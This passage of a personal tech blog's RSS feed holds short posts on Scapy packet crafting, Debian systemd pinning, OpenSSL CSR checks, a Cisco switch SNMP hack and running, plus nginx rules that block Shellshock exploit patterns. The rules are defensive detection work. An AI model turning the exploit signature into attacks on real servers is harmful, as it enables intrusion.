  4622. options    : PacketListField      = [&lt;IPOption  copy_flag=1L optclass=control option=commercial_security length=40 value='aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' |&gt;] ([])
  4623. &gt;&gt;&gt; sr1(packet)
  4624. </pre>
  4625. <p>The above code results in the following packet (as seen by <a href="" title="Wireshark Network Protocol Analyzer">Wireshark</a>):</p>
  4626. <p><img src="" alt="Wireshark showing the packet with the custom IP Option" width="540" height="576"></p>
  4627. ]]></description>
  4628.    <content:encoded><![CDATA[<p>Create packets with custom IPv4 IP Option fields using <a href="" title="Scapy is a powerful interactive packet manipulation program">Scapy</a>:</p>
  4629. <pre>
  4630. &gt;&gt;&gt; packet=IP(src="",dst="",options=[IPOption('%s%s'%('\x86\x28','a'*38))])
  4631. &gt;&gt;&gt; ls(packet)
  4632. version    : BitField             = 4               (4)
  4633. ihl        : BitField             = None            (None)
  4634. tos        : XByteField           = 0               (0)
  4635. len        : ShortField           = None            (None)
  4636. id         : ShortField           = 1               (1)
  4637. flags      : FlagsField           = 0               (0)
  4638. frag       : BitField             = 0               (0)
  4639. ttl        : ByteField            = 64              (64)
  4640. proto      : ByteEnumField        = 0               (0)
  4641. chksum     : XShortField          = None            (None)
  4642. src        : Emph                 = ''   (None)
  4643. dst        : Emph                 = ''   ('')
  4644. options    : PacketListField      = [&lt;IPOption  copy_flag=1L optclass=control option=commercial_security length=40 value='aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' |&gt;] ([])
  4645. &gt;&gt;&gt; sr1(packet)
  4646. </pre>
  4647. <p>The above code results in the following packet (as seen by <a href="" title="Wireshark Network Protocol Analyzer">Wireshark</a>):</p>
  4648. <p><img src="" alt="Wireshark showing the packet with the custom IP Option" width="540" height="576"></p>
  4649. ]]></content:encoded>
  4650.  </item>
  4652.  <item>
  4653.    <title>Upgrade to Debian 8 without systemd</title>
  4654.    <link></link>
  4655.    <guid isPermaLink="true"></guid>
  4656.    <dc:creator>Andreas Jaggi</dc:creator>
  4657.    <creativeCommons:license></creativeCommons:license>
  4658.    <pubDate>Sat, 11 Jul 2015 11:27:00 +0200</pubDate>
  4659.    <category domain="">Linux</category>
  4660.    <description><![CDATA[<p>To avoid the automatic installation/switch to systemd during the upgrade to Debian 8, it is enough to prevent the installation of the <code>systemd-sysv</code> package.</p>
  4661. <p>This can be done by creating a file <code>/etc/apt/preferences.d/no-systemd-sysv</code> with the following content:</p>
  4662. <pre>Package: systemd-sysv
  4663. Pin: release o=Debian
  4664. Pin-Priority: -1</pre>
  4665. <p>(<a href="" title="Debian 8 Jessie ohne Systemd betreiben">via</a>)</p>
  4666. ]]></description>
  4667.    <content:encoded><![CDATA[<p>To avoid the automatic installation/switch to systemd during the upgrade to Debian 8, it is enough to prevent the installation of the <code>systemd-sysv</code> package.</p>
  4668. <p>This can be done by creating a file <code>/etc/apt/preferences.d/no-systemd-sysv</code> with the following content:</p>
  4669. <pre>Package: systemd-sysv
  4670. Pin: release o=Debian
  4671. Pin-Priority: -1</pre>
  4672. <p>(<a href="" title="Debian 8 Jessie ohne Systemd betreiben">via</a>)</p>
  4673. ]]></content:encoded>
  4674.  </item>
  4676.  <item>
  4677.    <title>Obey the cloud!</title>
  4678.    <link></link>
  4679.    <guid isPermaLink="true"></guid>
  4680.    <dc:creator>Andreas Jaggi</dc:creator>
  4681.    <creativeCommons:license></creativeCommons:license>
  4682.    <pubDate>Sun, 05 Jul 2015 17:22:00 +0200</pubDate>
  4683.    <category domain="">Misc</category>
  4684.    <description><![CDATA[<p>So true...</p>
  4685. <p><img src="" alt="Johannes Kretzschmar - Obey the cloud!" width="450" height="2514"></p>
  4686. <p><a href="" title="Obey the cloud!">"Obey the cloud!"</a> by <a href="" title="Jojos illustrierter Blog">Johannes Kretzschmar</a>, licensed under <a href="" title="Creative Commons - Attribution-NonCommercial-ShareAlike 3.0 Unported - CC BY-NC-SA 3.0">CC BY-NC-SA 3.0</a>.</p>
  4687. ]]></description>
  4688.    <content:encoded><![CDATA[<p>So true...</p>
  4689. <p><img src="" alt="Johannes Kretzschmar - Obey the cloud!" width="450" height="2514"></p>
  4690. <p><a href="" title="Obey the cloud!">"Obey the cloud!"</a> by <a href="" title="Jojos illustrierter Blog">Johannes Kretzschmar</a>, licensed under <a href="" title="Creative Commons - Attribution-NonCommercial-ShareAlike 3.0 Unported - CC BY-NC-SA 3.0">CC BY-NC-SA 3.0</a>.</p>
  4691. ]]></content:encoded>
  4692.  </item>
  4694.  <item>
  4695.    <title>The Day Is My Enemy</title>
  4696.    <link></link>
  4697.    <guid isPermaLink="true"></guid>
  4698.    <dc:creator>Andreas Jaggi</dc:creator>
  4699.    <creativeCommons:license></creativeCommons:license>
  4700.    <pubDate>Tue, 24 Feb 2015 17:08:00 +0100</pubDate>
  4701.    <category domain="">Music</category>
  4702.    <description><![CDATA[<p><a href="" title="The Prodigy - The Day Is My Enemy - YouTube">The Prodigy - The Day Is My Enemy</a></p>
  4703. <p>Looking forward to see the live performance at the <a href="" title="Future Music Festival 2015 (">Future Music Festival 2015</a> :-)</p>
  4704. ]]></description>
  4705.    <content:encoded><![CDATA[<p><a href="" title="The Prodigy - The Day Is My Enemy - YouTube">The Prodigy - The Day Is My Enemy</a></p>
  4706. <p>Looking forward to see the live performance at the <a href="" title="Future Music Festival 2015 (">Future Music Festival 2015</a> :-)</p>
  4707. ]]></content:encoded>
  4708.  </item>
  4710.  <item>
  4711.    <title>Hand-crafted IP packets</title>
  4712.    <link></link>
  4713.    <guid isPermaLink="true"></guid>
  4714.    <dc:creator>Andreas Jaggi</dc:creator>
  4715.    <creativeCommons:license></creativeCommons:license>
  4716.    <pubDate>Sun, 11 Jan 2015 23:16:00 +0100</pubDate>
  4717.    <category domain="">Networking</category>
  4718.    <description><![CDATA[<p><a href="" title="Form RFC 791"><img src="" width="520" height="328" alt="Form RFC 791"></a></p>
  4719. <p>(<a href="" title="Hand-crafted IP packets with Form RFC 791">via</a>)</p>
  4720. ]]></description>
  4721.    <content:encoded><![CDATA[<p><a href="" title="Form RFC 791"><img src="" width="520" height="328" alt="Form RFC 791"></a></p>
  4722. <p>(<a href="" title="Hand-crafted IP packets with Form RFC 791">via</a>)</p>
  4723. ]]></content:encoded>
  4724.  </item>
  4726.  <item>
  4727.    <title>Christmas Run</title>
  4728.    <link></link>
  4729.    <guid isPermaLink="true"></guid>
  4730.    <dc:creator>Andreas Jaggi</dc:creator>
  4731.    <creativeCommons:license></creativeCommons:license>
  4732.    <pubDate>Thu, 25 Dec 2014 07:12:00 +0100</pubDate>
  4733.    <category domain="">Misc</category>
  4734.    <description><![CDATA[<p>Run #9 around <a href="" title="Centennial Parklands">Centennial Park</a>. Two rounds again, this time during noon with some nice sun and a whopping 30°C :-)</p>
  4735. <p><a href="" title="Centennial Midday Run 2x | Strava">Centennial Midday Run 2x</a></p>
  4736. ]]></description>
  4737.    <content:encoded><![CDATA[<p>Run #9 around <a href="" title="Centennial Parklands">Centennial Park</a>. Two rounds again, this time during noon with some nice sun and a whopping 30°C :-)</p>
  4738. <p><a href="" title="Centennial Midday Run 2x | Strava">Centennial Midday Run 2x</a></p>
  4739. ]]></content:encoded>
  4740.  </item>
  4742.  <item>
  4743.    <title>Advent Run #8</title>
  4744.    <link></link>
  4745.    <guid isPermaLink="true"></guid>
  4746.    <dc:creator>Andreas Jaggi</dc:creator>
  4747.    <creativeCommons:license></creativeCommons:license>
  4748.    <pubDate>Mon, 22 Dec 2014 23:35:00 +0100</pubDate>
  4749.    <category domain="">Misc</category>
  4750.    <description><![CDATA[<p>Run #8 around <a href="" title="Centennial Parklands">Centennial Park</a>. Two rounds again, and with some rain :-(</p>
  4751. <p><a href="" title="Centennial Morning Run 2x | Strava">Centennial Morning Run 2x</a></p>
  4752. ]]></description>
  4753.    <content:encoded><![CDATA[<p>Run #8 around <a href="" title="Centennial Parklands">Centennial Park</a>. Two rounds again, and with some rain :-(</p>
  4754. <p><a href="" title="Centennial Morning Run 2x | Strava">Centennial Morning Run 2x</a></p>
  4755. ]]></content:encoded>
  4756.  </item>
  4758.  <item>
  4759.    <title>Advent Run #7</title>
  4760.    <link></link>
  4761.    <guid isPermaLink="true"></guid>
  4762.    <dc:creator>Andreas Jaggi</dc:creator>
  4763.    <creativeCommons:license></creativeCommons:license>
  4764.    <pubDate>Thu, 18 Dec 2014 23:21:00 +0100</pubDate>
  4765.    <category domain="">Misc</category>
  4766.    <description><![CDATA[<p>Run #7 around <a href="" title="Centennial Parklands">Centennial Park</a>. Only one round, but the fastest one so far.</p>
  4767. <p><a href="" title="Centennial Morning Run | Strava">Centennial Morning Run</a></p>
  4768. ]]></description>
  4769.    <content:encoded><![CDATA[<p>Run #7 around <a href="" title="Centennial Parklands">Centennial Park</a>. Only one round, but the fastest one so far.</p>
  4770. <p><a href="" title="Centennial Morning Run | Strava">Centennial Morning Run</a></p>
  4771. ]]></content:encoded>
  4772.  </item>
  4774.  <item>
  4775.    <title>Advent Run #6</title>
  4776.    <link></link>
  4777.    <guid isPermaLink="true"></guid>
  4778.    <dc:creator>Andreas Jaggi</dc:creator>
  4779.    <creativeCommons:license></creativeCommons:license>
  4780.    <pubDate>Mon, 15 Dec 2014 23:31:00 +0100</pubDate>
  4781.    <category domain="">Misc</category>
  4782.    <description><![CDATA[<p>Run #6 around <a href="" title="Centennial Parklands">Centennial Park</a>. Two rounds this time, with a slower pace though.</p>
  4783. <p><a href="" title="Centennial Morning Run 2x | Strava">Centennial Morning Run 2x</a></p>
  4784. ]]></description>
  4785.    <content:encoded><![CDATA[<p>Run #6 around <a href="" title="Centennial Parklands">Centennial Park</a>. Two rounds this time, with a slower pace though.</p>
  4786. <p><a href="" title="Centennial Morning Run 2x | Strava">Centennial Morning Run 2x</a></p>
  4787. ]]></content:encoded>
  4788.  </item>
  4790.  <item>
  4791.    <title>Advent Run #5</title>
  4792.    <link></link>
  4793.    <guid isPermaLink="true"></guid>
  4794.    <dc:creator>Andreas Jaggi</dc:creator>
  4795.    <creativeCommons:license></creativeCommons:license>
  4796.    <pubDate>Thu, 11 Dec 2014 22:51:00 +0100</pubDate>
  4797.    <category domain="">Misc</category>
  4798.    <description><![CDATA[<p>Run #5 around <a href="" title="Centennial Parklands">Centennial Park</a>. Didn't have the patience to wait for the GPS to lock onto the signal, thus the late start.</p>
  4799. <p><a href="" title="Centennial Morning Run | Strava">Centennial Morning Run</a></p>
  4800. ]]></description>
  4801.    <content:encoded><![CDATA[<p>Run #5 around <a href="" title="Centennial Parklands">Centennial Park</a>. Didn't have the patience to wait for the GPS to lock onto the signal, thus the late start.</p>
  4802. <p><a href="" title="Centennial Morning Run | Strava">Centennial Morning Run</a></p>
  4803. ]]></content:encoded>
  4804.  </item>
  4806.  <item>
  4807.    <title>Advent Run #4</title>
  4808.    <link></link>
  4809.    <guid isPermaLink="true"></guid>
  4810.    <dc:creator>Andreas Jaggi</dc:creator>
  4811.    <creativeCommons:license></creativeCommons:license>
  4812.    <pubDate>Tue, 09 Dec 2014 23:14:00 +0100</pubDate>
  4813.    <category domain="">Misc</category>
  4814.    <description><![CDATA[<p>Run #4 around <a href="" title="Centennial Parklands">Centennial Park</a>, this time a bit later and thus with more sun:</p>
  4815. <p><a href="" title="Centennial Morning Run | Strava">Centennial Morning Run</a></p>
  4816. ]]></description>
  4817.    <content:encoded><![CDATA[<p>Run #4 around <a href="" title="Centennial Parklands">Centennial Park</a>, this time a bit later and thus with more sun:</p>
  4818. <p><a href="" title="Centennial Morning Run | Strava">Centennial Morning Run</a></p>
  4819. ]]></content:encoded>
  4820.  </item>
  4822.  <item>
  4823.    <title>Advent Run #3</title>
  4824.    <link></link>
  4825.    <guid isPermaLink="true"></guid>
  4826.    <dc:creator>Andreas Jaggi</dc:creator>
  4827.    <creativeCommons:license></creativeCommons:license>
  4828.    <pubDate>Mon, 08 Dec 2014 22:53:00 +0100</pubDate>
  4829.    <category domain="">Misc</category>
  4830.    <description><![CDATA[<p>Another run around <a href="" title="Centennial Parklands">Centennial Park</a>, this time counterclockwise:</p>
  4831. <p><a href="" title="Centennial Morning Run | Strava">Centennial Morning Run</a></p>
  4832. ]]></description>
  4833.    <content:encoded><![CDATA[<p>Another run around <a href="" title="Centennial Parklands">Centennial Park</a>, this time counterclockwise:</p>
  4834. <p><a href="" title="Centennial Morning Run | Strava">Centennial Morning Run</a></p>
  4835. ]]></content:encoded>
  4836.  </item>
  4838.  <item>
  4839.    <title>Advent Run #2</title>
  4840.    <link></link>
  4841.    <guid isPermaLink="true"></guid>
  4842.    <dc:creator>Andreas Jaggi</dc:creator>
  4843.    <creativeCommons:license></creativeCommons:license>
  4844.    <pubDate>Wed, 03 Dec 2014 22:43:00 +0100</pubDate>
  4845.    <category domain="">Misc</category>
  4846.    <description><![CDATA[<p>Next run around the beautiful <a href="" title="Centennial Parklands">Centennial Park</a>:</p>
  4847. <p><a href="" title="Centennial Morning Run | Strava">Centennial Morning Run</a></p>
  4848. ]]></description>
  4849.    <content:encoded><![CDATA[<p>Next run around the beautiful <a href="" title="Centennial Parklands">Centennial Park</a>:</p>
  4850. <p><a href="" title="Centennial Morning Run | Strava">Centennial Morning Run</a></p>
  4851. ]]></content:encoded>
  4852.  </item>
  4854.  <item>
  4855.    <title>Advent Run #1</title>
  4856.    <link></link>
  4857.    <guid isPermaLink="true"></guid>
  4858.    <dc:creator>Andreas Jaggi</dc:creator>
  4859.    <creativeCommons:license></creativeCommons:license>
  4860.    <pubDate>Mon, 01 Dec 2014 22:34:00 +0100</pubDate>
  4861.    <category domain="">Misc</category>
  4862.    <description><![CDATA[<p>The nice thing of being in Sydney during December is that you can go running during christmas time and it is 22°C :-)</p>
  4863. <p><a href="" title="Centennial Morning Run | Strava">Centennial Morning Run</a></p>
  4864. ]]></description>
  4865.    <content:encoded><![CDATA[<p>The nice thing of being in Sydney during December is that you can go running during christmas time and it is 22°C :-)</p>
  4866. <p><a href="" title="Centennial Morning Run | Strava">Centennial Morning Run</a></p>
  4867. ]]></content:encoded>
  4868.  </item>
  4870.  <item>
  4871.    <title>Regex Crossword</title>
  4872.    <link></link>
  4873.    <guid isPermaLink="true"></guid>
  4874.    <dc:creator>Andreas Jaggi</dc:creator>
  4875.    <creativeCommons:license></creativeCommons:license>
  4876.    <pubDate>Sun, 30 Nov 2014 21:55:00 +0100</pubDate>
  4877.    <category domain="">Coding</category>
  4878.    <description><![CDATA[<p><img src="" width="520" height="351" alt="The End | Regex Crossword"></p>
  4879. <p><a href="" title="Regex Crossword">Regex Crossword</a> (<a href="" title="Regex Crossword | Hacker News">via</a>)</p>
  4880. ]]></description>
  4881.    <content:encoded><![CDATA[<p><img src="" width="520" height="351" alt="The End | Regex Crossword"></p>
  4882. <p><a href="" title="Regex Crossword">Regex Crossword</a> (<a href="" title="Regex Crossword | Hacker News">via</a>)</p>
  4883. ]]></content:encoded>
  4884.  </item>
  4886.  <item>
  4887.    <title>The UNIX System</title>
  4888.    <link></link>
  4889.    <guid isPermaLink="true"></guid>
  4890.    <dc:creator>Andreas Jaggi</dc:creator>
  4891.    <creativeCommons:license></creativeCommons:license>
  4892.    <pubDate>Mon, 24 Nov 2014 23:26:00 +0100</pubDate>
  4893.    <category domain="">Linux</category>
  4894.    <description><![CDATA[<p><a href="" title="AT&amp;T Archives: The UNIX Operation System - YouTube">AT&amp;T Archives: The UNIX Operation System</a></p>
  4895. <p>The UNIX System: Making Computers More Productive, 1982, Bell Laboratories</p>
  4896. ]]></description>
  4897.    <content:encoded><![CDATA[<p><a href="" title="AT&amp;T Archives: The UNIX Operation System - YouTube">AT&amp;T Archives: The UNIX Operation System</a></p>
  4898. <p>The UNIX System: Making Computers More Productive, 1982, Bell Laboratories</p>
  4899. ]]></content:encoded>
  4900.  </item>
  4902.  <item>
  4903.    <title>SixSpotting</title>
  4904.    <link></link>
  4905.    <guid isPermaLink="true"></guid>
  4906.    <dc:creator>Andreas Jaggi</dc:creator>
  4907.    <creativeCommons:license></creativeCommons:license>
  4908.    <pubDate>Sun, 02 Nov 2014 08:43:00 +0100</pubDate>
  4909.    <category domain="">Networking</category>
  4910.    <description><![CDATA[<p><img src="" width="618" height="463" alt="IPv6 - IS FOR REALZ NOWZ, SRUSLY"></p>
  4911. <p><a href="" title="SixSpotting">SixSpotting</a>, a funny little game where you collect points by logging in from as many IPv6 enabled providers as possible.</p>
  4912. ]]></description>
  4913.    <content:encoded><![CDATA[<p><img src="" width="618" height="463" alt="IPv6 - IS FOR REALZ NOWZ, SRUSLY"></p>
  4914. <p><a href="" title="SixSpotting">SixSpotting</a>, a funny little game where you collect points by logging in from as many IPv6 enabled providers as possible.</p>
  4915. ]]></content:encoded>
  4916.  </item>
  4918.  <item>
  4919.    <title>Show Shellshock the door</title>
  4920.    <link></link>
  4921.    <guid isPermaLink="true"></guid>
  4922.    <dc:creator>Andreas Jaggi</dc:creator>
  4923.    <creativeCommons:license></creativeCommons:license>
  4924.    <pubDate>Sat, 18 Oct 2014 18:45:00 +0200</pubDate>
  4925.    <category domain="">Networking</category>
  4926.    <description><![CDATA[<p>
  4927. Lately the requests trying to exploit the <a href="" title="Shellshock (software bug)">Shellshock vulnerability</a> are getting annoying.
  4928. Of course my hosts are patched &mdash; even before the first such request arrived &mdash; and they are using <a href="" title="Debian Almquist shell">Dash</a> as /bin/sh anyway.<br>
  4929. But this does not stop attackers from sending those requests.
  4930. Some even seem to have programmed a loop which sends request after request even though their exploit is not working.
  4931. </p>
  4932. <p>
  4933. Since most of the requests are for valid URLs, the webserver just replies with a 200 status code and serves the content.
  4934. As this gives no indication to the attacker whether his exploit worked or not, he has no reason to remove the host from his target-list and thus continues to send requests.
  4935. </p>
  4936. <p>
  4937. To break this pattern and signal that the host is not vulnerable to Shellshock, I came up with the <a href="" title="nginx">nginx</a> config snippet below.
  4938. It recognizes Shellshock patterns in a request and replies with a '403 Forbidden' status code, thus indicating to an attacker that his request was blocked.
  4939. </p>
  4940. <pre>
  4941. if ( $http_referer ~ ^\s*\(\s*\)\s*\{ ) {
  4942.        return 403 "Blocked by Shellshock protection (";
  4943. }
  4944. if ( $http_user_agent ~ ^\s*\(\s*\)\s*\{ ) {
  4945.        return 403 "Blocked by Shellshock protection (";
  4946. }
  4947. if ( $http_cookie ~ ^\s*\(\s*\)\s*\{ ) {
  4948.        return 403 "Blocked by Shellshock protection (";
  4949. }
  4950. if ( $http_host ~ ^\s*\(\s*\)\s*\{ ) {
  4951.        return 403 "Blocked by Shellshock protection (";
  4952. }
  4953. if ( $args ~ ^\s*\(\s*\)\s*\{ ) {
  4954.        return 403 "Blocked by Shellshock protection (";
  4955. }
  4956. if ( $content_type ~ ^\s*\(\s*\)\s*\{ ) {
  4957.        return 403 "Blocked by Shellshock protection (";
  4958. }
  4959. if ( $remote_user ~ ^\s*\(\s*\)\s*\{ ) {
  4960.        return 403 "Blocked by Shellshock protection (";
  4961. }
  4962. if ( $request ~ ^\s*\(\s*\)\s*\{ ) {
  4963.        return 403 "Blocked by Shellshock protection (";
  4964. }
  4965. if ( $request_body ~ ^\s*\(\s*\)\s*\{ ) {
  4966.        return 403 "Blocked by Shellshock protection (";
  4967. }
  4968. </pre>
  4969. ]]></description>
  4970.    <content:encoded><![CDATA[<p>
  4971. Lately the requests trying to exploit the <a href="" title="Shellshock (software bug)">Shellshock vulnerability</a> are getting annoying.
  4972. Of course my hosts are patched &mdash; even before the first such request arrived &mdash; and they are using <a href="" title="Debian Almquist shell">Dash</a> as /bin/sh anyway.<br>
  4973. But this does not stop attackers from sending those requests.
  4974. Some even seem to have programmed a loop which sends request after request even though their exploit is not working.
  4975. </p>
  4976. <p>
  4977. Since most of the requests are for valid URLs, the webserver just replies with a 200 status code and serves the content.
  4978. As this gives no indication to the attacker whether his exploit worked or not, he has no reason to remove the host from his target-list and thus continues to send requests.
  4979. </p>
  4980. <p>
  4981. To break this pattern and signal that the host is not vulnerable to Shellshock, I came up with the <a href="" title="nginx">nginx</a> config snippet below.
  4982. It recognizes Shellshock patterns in a request and replies with a '403 Forbidden' status code, thus indicating to an attacker that his request was blocked.
  4983. </p>
  4984. <pre>
  4985. if ( $http_referer ~ ^\s*\(\s*\)\s*\{ ) {
  4986.        return 403 "Blocked by Shellshock protection (";
  4987. }
  4988. if ( $http_user_agent ~ ^\s*\(\s*\)\s*\{ ) {
  4989.        return 403 "Blocked by Shellshock protection (";
  4990. }
  4991. if ( $http_cookie ~ ^\s*\(\s*\)\s*\{ ) {
  4992.        return 403 "Blocked by Shellshock protection (";
  4993. }
  4994. if ( $http_host ~ ^\s*\(\s*\)\s*\{ ) {
  4995.        return 403 "Blocked by Shellshock protection (";
  4996. }
  4997. if ( $args ~ ^\s*\(\s*\)\s*\{ ) {
  4998.        return 403 "Blocked by Shellshock protection (";
  4999. }
  5000. if ( $content_type ~ ^\s*\(\s*\)\s*\{ ) {
  5001.        return 403 "Blocked by Shellshock protection (";
  5002. }
  5003. if ( $remote_user ~ ^\s*\(\s*\)\s*\{ ) {
  5004.        return 403 "Blocked by Shellshock protection (";
  5005. }
  5006. if ( $request ~ ^\s*\(\s*\)\s*\{ ) {
  5007.        return 403 "Blocked by Shellshock protection (";
  5008. }
  5009. if ( $request_body ~ ^\s*\(\s*\)\s*\{ ) {
  5010.        return 403 "Blocked by Shellshock protection (";
  5011. }
  5012. </pre>
  5013. ]]></content:encoded>
  5014.  </item>
  5016.  <item>
  5017.    <title>Inspect CSR with OpenSSL</title>
  5018.    <link></link>
  5019.    <guid isPermaLink="true"></guid>
  5020.    <dc:creator>Andreas Jaggi</dc:creator>
  5021.    <creativeCommons:license></creativeCommons:license>
  5022.    <pubDate>Fri, 17 Oct 2014 10:45:00 +0200</pubDate>
  5023.    <category domain="">Linux</category>
  5024.    <description><![CDATA[<p>Before sending a <abbr title="Certificate Signing Request">CSR</abbr> off to your <abbr title="Certificate Authority">CA</abbr>, it is worth checking that all parameters are correct.<br>Especially you should make sure that the requested signature algorithm is SHA256 and not the deprecated SHA1.</p>
  5025. <p>This can be done with the following OpenSSL command:</p>
  5026. <pre>openssl req -noout -text -in &lt;your_CSR_file&gt;</pre>
  5027. ]]></description>
  5028.    <content:encoded><![CDATA[<p>Before sending a <abbr title="Certificate Signing Request">CSR</abbr> off to your <abbr title="Certificate Authority">CA</abbr>, it is worth checking that all parameters are correct.<br>Especially you should make sure that the requested signature algorithm is SHA256 and not the deprecated SHA1.</p>
  5029. <p>This can be done with the following OpenSSL command:</p>
  5030. <pre>openssl req -noout -text -in &lt;your_CSR_file&gt;</pre>
  5031. ]]></content:encoded>
  5032.  </item>
  5034.  <item>
  5035.    <title>Blueprint of IKEA</title>
  5036.    <link></link>
  5037.    <guid isPermaLink="true"></guid>
  5038.    <dc:creator>Andreas Jaggi</dc:creator>
  5039.    <creativeCommons:license></creativeCommons:license>
  5040.    <pubDate>Mon, 13 Oct 2014 06:38:00 +0200</pubDate>
  5041.    <category domain="">Misc</category>
  5042.    <description><![CDATA[<p>Spot-on representation of every IKEA store's layout:</p>
  5043. <p><a href="" title="Blueprint of IKEA"><img src="" alt="Blueprint of IKEA" width="540" height="255"></a></p>
  5044. ]]></description>
  5045.    <content:encoded><![CDATA[<p>Spot-on representation of every IKEA store's layout:</p>
  5046. <p><a href="" title="Blueprint of IKEA"><img src="" alt="Blueprint of IKEA" width="540" height="255"></a></p>
  5047. ]]></content:encoded>
  5048.  </item>
  5050.  <item>
  5051.    <title>NORWAY - A Time-Lapse Adventure</title>
  5052.    <link></link>
  5053.    <guid isPermaLink="true"></guid>
  5054.    <dc:creator>Andreas Jaggi</dc:creator>
  5055.    <creativeCommons:license></creativeCommons:license>
  5056.    <pubDate>Sun, 05 Oct 2014 08:38:00 +0200</pubDate>
  5057.    <category domain="">Misc</category>
  5058.    <description><![CDATA[<p><a href="" title="SEASONS of NORWAY - A Time-Lapse Adventure - Vimeo">SEASONS of NORWAY - A Time-Lapse Adventure</a></p>
  5059. <p><a href="" title="SEASONS of NORWAY - A Time-Lapse Adventure">SEASONS of NORWAY - A Time-Lapse Adventure</a> from <a href="" title="Rustad Media">Rustad Media</a> on <a href="" title="Vimeo">Vimeo</a>. (<a href="" title="Markus Kniebes">via</a>)</p>
  5060. ]]></description>
  5061.    <content:encoded><![CDATA[<p><a href="" title="SEASONS of NORWAY - A Time-Lapse Adventure - Vimeo">SEASONS of NORWAY - A Time-Lapse Adventure</a></p>
  5062. <p><a href="" title="SEASONS of NORWAY - A Time-Lapse Adventure">SEASONS of NORWAY - A Time-Lapse Adventure</a> from <a href="" title="Rustad Media">Rustad Media</a> on <a href="" title="Vimeo">Vimeo</a>. (<a href="" title="Markus Kniebes">via</a>)</p>
  5063. ]]></content:encoded>
  5064.  </item>
  5066.  <item>
  5067.    <title>How to enable SNMP on a Cisco SLM2008 Smart Switch</title>
  5068.    <link></link>
  5069.    <guid isPermaLink="true"></guid>
  5070.    <dc:creator>Andreas Jaggi</dc:creator>
  5071.    <creativeCommons:license></creativeCommons:license>
  5072.    <pubDate>Sun, 05 Oct 2014 00:31:00 +0200</pubDate>
  5073.    <category domain="">Networking</category>
  5074.    <description><![CDATA[<p>The Cisco SMB SLM2008 Smart Switch does normally not support SNMP and there is also no setting in the configuration interface which would enable SNMP.</p>
  5076. <p>But nevertheless the firmware does actually contain a SNMP daemon. Thus it is not surprising that a <a href="" title="SLM2008 vs SNMP">smart guy on to the Cisco support forum</a> found out how to manipulate the proprietary config file such that it enables the SNMP daemon:</p>
  5078. <ol>
  5079. <li>Configure your switch with everything you need</li>
  5080. <li>Download <a href="" title=""></a></li>
  5081. <li>Run <code># perl &lt;IP of your switch&gt;</code></li>
  5082. <li>Enjoy the SNMP export from the SLM2008 :-)</li>
  5083. </ol>
  5084. <p>As this is a non-official hack, there are some limitations:</p>
  5085. <ul>
  5086. <li>The embedded SNMP daemon only supports read accces and no SNMP Traps.</li>
  5087. <li>Changing a setting on the 'System' configuration tab disables the SNMP daemon again (thus the script will need to be run again).</li>
  5088. </ul>
  5089. ]]></description>
  5090.    <content:encoded><![CDATA[<p>The Cisco SMB SLM2008 Smart Switch does normally not support SNMP and there is also no setting in the configuration interface which would enable SNMP.</p>
  5092. <p>But nevertheless the firmware does actually contain a SNMP daemon. Thus it is not surprising that a <a href="" title="SLM2008 vs SNMP">smart guy on to the Cisco support forum</a> found out how to manipulate the proprietary config file such that it enables the SNMP daemon:</p>
  5094. <ol>
  5095. <li>Configure your switch with everything you need</li>
  5096. <li>Download <a href="" title=""></a></li>
  5097. <li>Run <code># perl &lt;IP of your switch&gt;</code></li>
  5098. <li>Enjoy the SNMP export from the SLM2008 :-)</li>
  5099. </ol>
  5100. <p>As this is a non-official hack, there are some limitations:</p>
  5101. <ul>
  5102. <li>The embedded SNMP daemon only supports read accces and no SNMP Traps.</li>
  5103. <li>Changing a setting on the 'System' configuration tab disables the SNMP daemon again (thus the script will need to be run again).</li>
  5104. </ul>
  5105. ]]></content:encoded>
  5106.  </item>
  5108.  <item>
  5109.    <title>The Cyborgs</title>
  5110.    <link></link>
  5111.    <guid isPermaLink="true"></guid>
  5112.    <dc:creator>Andreas Jaggi</dc:creator>
  5113.    <creativeCommons:license></creativeCommons:license>
  5114.    <pubDate>Wed, 01 Oct 2014 00:10:00 +0200</pubDate>
  5115.    <category domain="">Music</category>
  5116.    <description><![CDATA[<p><a href="" title="The Cyborgs - Electric Chair - YouTube">The Cyborgs - Electric Chair</a></p>
  5117. <p><a href="" title="The Cyborgs - Two Men Band">The Cyborgs</a> is a two man 'elektrock' boogie band.<br>Thank you <a href="" title="Sat Rocks">Sat Rocks</a> for showing me their music :-)</p>
  5118. ]]></description>
  5119.    <content:encoded><![CDATA[<p><a href="" title="The Cyborgs - Electric Chair - YouTube">The Cyborgs - Electric Chair</a></p>
  5120. <p><a href="" title="The Cyborgs - Two Men Band">The Cyborgs</a> is a two man 'elektrock' boogie band.<br>Thank you <a href="" title="Sat Rocks">Sat Rocks</a> for showing me their music :-)</p>
  5121. ]]></content:encoded>
  5122.  </item>
  5124.  <item>
  5125.    <title>CVS and SVN repositories moved to Git</title>
  5126.    <link></link>
  5127.    <guid isPermaLink="true"></guid>
  5128.    <dc:creator>Andreas Jaggi</dc:creator>
  5129.    <creativeCommons:license></creativeCommons:license>
  5130.    <pubDate>Sun, 28 Sep 2014 20:01:00 +0200</pubDate>
  5131.    <category domain="">Misc</category>
  5132.    <description><![CDATA[<p>Today I did some cleanup of my legacy infrastructure. The repositories formerly located at <a href="" title=""></a> and <a href="" title=""></a> have been converted to <a href="" title="Git">Git</a> and are now available at <a href="" title=""></a>.</p>
  5133. <p>Also is <a href="" title=""></a> now no longer served by the old gitweb.cgi but by the fantastic <a href="" title="GitBucket">GitBucket</a> (a lightweight, self-contained <a href="" title="GitHub">GitHub</a> clone written in <a href="" title="The Scala Programming Language">Scala</a>).</p>
  5134. ]]></description>
  5135.    <content:encoded><![CDATA[<p>Today I did some cleanup of my legacy infrastructure. The repositories formerly located at <a href="" title=""></a> and <a href="" title=""></a> have been converted to <a href="" title="Git">Git</a> and are now available at <a href="" title=""></a>.</p>
  5136. <p>Also is <a href="" title=""></a> now no longer served by the old gitweb.cgi but by the fantastic <a href="" title="GitBucket">GitBucket</a> (a lightweight, self-contained <a href="" title="GitHub">GitHub</a> clone written in <a href="" title="The Scala Programming Language">Scala</a>).</p>
  5137. ]]></content:encoded>
  5138.  </item>
  5140.  <item>
  5141.    <title>Netflix in Switzerland via IPv6</title>
  5142.    <link></link>
  5143.    <guid isPermaLink="true"></guid>
  5144.    <dc:creator>Andreas Jaggi</dc:creator>
  5145.    <creativeCommons:license></creativeCommons:license>
